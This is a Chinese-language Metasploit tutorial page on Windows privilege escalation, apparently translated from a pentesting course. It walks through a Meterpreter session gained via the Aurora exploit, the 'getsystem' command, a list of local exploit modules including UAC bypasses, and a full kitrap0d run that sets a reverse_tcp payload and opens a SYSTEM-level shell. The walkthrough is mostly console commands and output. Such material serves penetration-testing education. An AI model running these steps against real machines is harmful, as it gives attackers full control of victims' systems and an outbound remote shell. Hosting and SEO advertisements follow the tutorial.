Metasploit 特权升级

通常,尤其是在客户端漏洞攻击方面,您会发现您的会话只具有有限的用户权限。这可能会严重限制您可以在远程系统上执行的操作,如转储密码,操作注册表,安装后门等。幸运的是,Metasploit有一个Meterpreter脚本'getsystem',它将使用许多不同的技术来尝试获取远程系统上的SYSTEM级权限。还有其他各种(本地)漏洞可以用来提升权限。

Meterpreter

 

使用臭名昭着的'Aurora'漏洞,我们看到我们的Meterpreter会话仅作为普通用户帐户运行。

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >

 

GetSystem

要使用'getsystem'命令,如果它尚未加载,我们需要先加载'priv'扩展名。

meterpreter > use priv
Loading extension priv...success.
meterpreter >

 

使用“-h”开关运行getsystem 将显示可用的选项。

meterpreter > getsystem -h
用法: getsystem [选项]

尝试将您的特权提升为本地系统的特权。

选项:

    -h        帮助横幅。
    -t <opt>  使用的技巧。 (默认为'0')。
		0:所有技术可用
		1:服务 - 命名管道模拟(内存/管理员)
		2:服务 - 命名管道模拟(管理员/管理员)
		3:服务 - 令牌复制(在内存/管理员中)


meterpreter >

 

我们会让Metasploit尝试通过运行“ getsystem ” 来为我们完成繁重的任务,而没有任何选择。该脚本将尝试每个可用的方法,并在其成功时停止。在眨眼间,我们的会话现在以SYSTEM权限运行。

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

 

本地漏洞利用(Local Exploits)

有些情况下getystem失败。例如:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

 

发生这种情况时,我们可以为会话提供背景信息,并手动尝试Metasploit提供的其他一些漏洞。注意:可用的漏洞会随着时间而改变。

meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...略...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...略...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...略...
msf exploit(ms10_002_aurora) >

 

让我们尝试在我们的目标上使用着名的kitrap0d漏洞利用。我们的示例是一个32位机器,并被列为易受攻击目标之一。

msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.161    yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf exploit(ms10_015_kitrap0d) > exploit

[*]  Started reverse handler on 192.168.1.161:4443 
[*]  Launching notepad to host the exploit...
[+]  Process 4048 launched.
[*]  Reflectively injecting the exploit DLL into 4048...
[*]  Injecting exploit into 4048 ...
[*]  Exploit injected. Injecting payload into 4048...
[*]  Payload injected. Executing exploit...
[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*]  Sending stage (769024 bytes) to 192.168.1.71
[*]  Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2017-03-11 11:14:00 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
    A+
发布日期:2018年06月02日  所属分类:Metasploit
最后修改时间:2018-06-02 07:36
评分: (1 票;平均数5.00 ;最高评分 5 ;用户总数1;总得分 5;百分比100.00)
付杰
wordpress discux dedecms 帝国 phpcms等快速建站服务
wordpress discux dedecms 帝国 phpcms等快速建站服务
  • ¥ 99.9元
  • 市场价:499.9元
PHP运行环境 Wamp Lamp Lnmp 安装、配置、搭建服务
PHP运行环境 Wamp Lamp Lnmp 安装、配置、搭建服务
  • ¥ 9.9元
  • 市场价:49.9元
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
  • ¥ 99.9元
  • 市场价:5000元
wordpress站群服务 泛解析二级域名站群 二级目录站群
wordpress站群服务 泛解析二级域名站群 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: